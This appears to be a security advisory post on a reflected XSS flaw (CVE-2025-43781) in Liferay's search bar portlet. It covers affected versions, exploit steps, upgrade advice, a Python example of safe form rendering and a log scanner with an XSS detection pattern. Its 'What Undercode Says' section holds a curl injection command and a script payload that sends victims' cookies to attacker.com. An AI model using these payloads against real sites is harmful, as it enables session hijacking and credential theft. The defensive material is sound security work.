Liferay Portal, Reflected Cross-site Scripting, CVE-2025-43781 (MEDIUM)


This vulnerability is a reflected Cross-Site Scripting (XSS) flaw in the search bar portlet of Liferay Portal and Liferay DXP. The issue originates from the `getSearchURL()` method of the `SearchBarPortletDisplayContext` object, which returns a user-controlled URL value without proper sanitization. Specifically, the vulnerability exists in the `view.jsp` file, where the unescaped output of `getSearchURL()` is rendered as the `action` attribute of an HTML `<form>` element. When an attacker crafts a URL containing malicious JavaScript and tricks a user into visiting it, the script is embedded into the page and executed in the victim’s browser context. The attack is ‘reflected’ because the malicious payload is delivered in a single HTTP request and immediately reflected back in the server’s response. Successful exploitation requires user interaction, as the victim must click the crafted link. The vulnerability stems from improper neutralization of user input during web page generation, classified as CWE-79.
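The following is an added illustration, not Liferay code: a Python model of the rendering pattern the advisory describes (a URL written straight into a `<form action="...">` attribute) beside a hardened version. The function names `render_form_unsafe`, `render_form_safe` and `is_safe_action_url` are hypothetical, and the sample URL values are constructed. The point it adds is that attribute-context escaping alone is not a complete fix for a URL attribute: a `javascript:` value sits happily inside a correctly quoted attribute, so the URL's shape (a same-origin relative path) has to be validated as well.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs: the first is what the portlet expects in a
# search URL, the others are hostile values of the kinds the advisory implies.
SAMPLE_URLS = [
    "/group/guest/search?p_p_id=search",          # legitimate relative path
    '"><script>alert(1)</script><form action="',  # breaks out of the attribute
    "javascript:alert(1)",                        # needs no quote break-out at all
    "//evil.example/search",                      # protocol-relative, leaves the site
]


def render_form_unsafe(search_url: str) -> str:
    """Mirror of the vulnerable pattern: the value is interpolated into the
    action attribute with no validation and no escaping."""
    return f'<form action="{search_url}" method="get">'


def is_safe_action_url(url: str) -> bool:
    """Accept only same-origin relative paths.

    Rejects any explicit scheme (javascript:, data:, http:) and any form
    that a browser may read as an authority ("//host", and "/\\host",
    which some browsers normalise to "//host").  This is the check that
    escaping cannot replace.
    """
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:
        return False
    return url.startswith("/") and not url.startswith(("//", "/\\"))


def render_form_safe(search_url: str, fallback: str = "/search") -> str:
    """Hardened rendering: validate the URL's shape first, then HTML-escape
    it for the attribute context (quote=True escapes both " and ')."""
    if not is_safe_action_url(search_url):
        search_url = fallback
    return f'<form action="{html.escape(search_url, quote=True)}" method="get">'


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print("unsafe:", render_form_unsafe(url))
        print("safe:  ", render_form_safe(url))
        print()
```

The first hostile sample shows why the output must be escaped (it closes the attribute and opens a script element); the second shows why escaping is not enough (nothing in it needs escaping, yet it runs when the form is submitted); the third shows why the authority part must be rejected even without a scheme. Only the combination of shape validation and context-correct escaping closes all three.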


Platform: Liferay Portal/DXP
Version: 7.4.3.110-7.4.3.128
Vulnerability: Reflected XSS
Severity: Medium (5.3)
Date: 2025-09-09

Prediction: Patched 2025-04-10

What Undercode Says

curl -i "http://<target>/group/guest/search?_struts_action=/search/search" --data-urlencode "keywords=<script>alert('XSS')</script>"
<!-- Malicious payload for URL parameter -->
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
# Check application version for patch
grep "liferay.version" portal-ext.properties

How the Exploit Works

  1. Attacker constructs a malicious URL embedding a script payload in a search parameter.
  2. The attacker socially engineers a victim to click the link (e.g., via email).
  3. The vulnerable portlet includes the unescaped payload in the page’s form action.
  4. The victim’s browser receives the page and executes the attacker’s script.

Protection from this CVE

Upgrade to Liferay Portal 7.4.3.129.

Upgrade to Liferay DXP 2024.Q1.13, 2024.Q3.9, or 2024.Q4.0.

Implement a WAF rule to filter XSS patterns in URLs.
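As an added example for the filtering recommendation above (not part of the original post or of any Liferay or WAF product), the following Python script scans constructed access-log lines for search requests whose parameters carry markup or a `javascript:` scheme after percent-decoding. The log lines, IP addresses and the function names `suspicious_search_requests` and `fully_decode` are all constructed for the example. The practitioner detail it shows is that the indicator match must run on the decoded value, with nested encoding undone a bounded number of times, or a `%253C` (double-encoded `<`) passes straight through a rule that looks for a literal `<`.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines in combined log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [09/Sep/2025:10:00:01 +0000] "GET /group/guest/search?q=liferay+portal HTTP/1.1" 200 5120
203.0.113.11 - - [09/Sep/2025:10:00:02 +0000] "GET /group/guest/search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5200
203.0.113.12 - - [09/Sep/2025:10:00:03 +0000] "GET /group/guest/search?q=%2522%253E%253Cscript%253E HTTP/1.1" 200 5200
203.0.113.13 - - [09/Sep/2025:10:00:04 +0000] "GET /web/guest/home HTTP/1.1" 200 8000
203.0.113.14 - - [09/Sep/2025:10:00:05 +0000] "GET /group/guest/search?q=javascript%3Aalert(1) HTTP/1.1" 200 5200
"""

# One request line: client IP, timestamp, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators relevant to this class of flaw: a tag opening, a javascript:
# scheme, or an on*= event handler.  Deliberately narrow; this is a triage
# signal for search-endpoint traffic, not a general-purpose XSS blocklist.
INDICATOR_RE = re.compile(r'<\s*/?\s*[a-z]|javascript\s*:|\bon[a-z]+\s*=', re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo nested percent-encoding, bounded so a hostile value cannot make
    the scanner loop indefinitely."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_search_requests(log_text: str) -> list:
    """Return one record per request to a /search path whose decoded query
    parameters contain an indicator."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.endswith("/search"):
            continue
        # parse_qsl performs one round of decoding; fully_decode handles the rest.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            decoded = fully_decode(value)
            if INDICATOR_RE.search(decoded):
                hits.append({"ip": match.group("ip"), "param": name, "decoded": decoded})
                break
    return hits


if __name__ == "__main__":
    for hit in suspicious_search_requests(SAMPLE_LOG):
        print(f'{hit["ip"]}  param={hit["param"]}  decoded={hit["decoded"]!r}')
```

Run against the constructed sample, three of the five lines are flagged: the plainly encoded script tag, the double-encoded `"><script>` that a single-pass filter would miss, and the `javascript:` value that contains no markup at all. The home-page request is skipped before any parameter is inspected, which keeps the rule scoped to the affected portlet's endpoint rather than to the whole site.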

Impact

CVSS 4.0 score: 5.3 (Medium).

Consequences: Session hijacking, credential theft, defacement.

Scope: Attack affects user’s browser, not the server.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
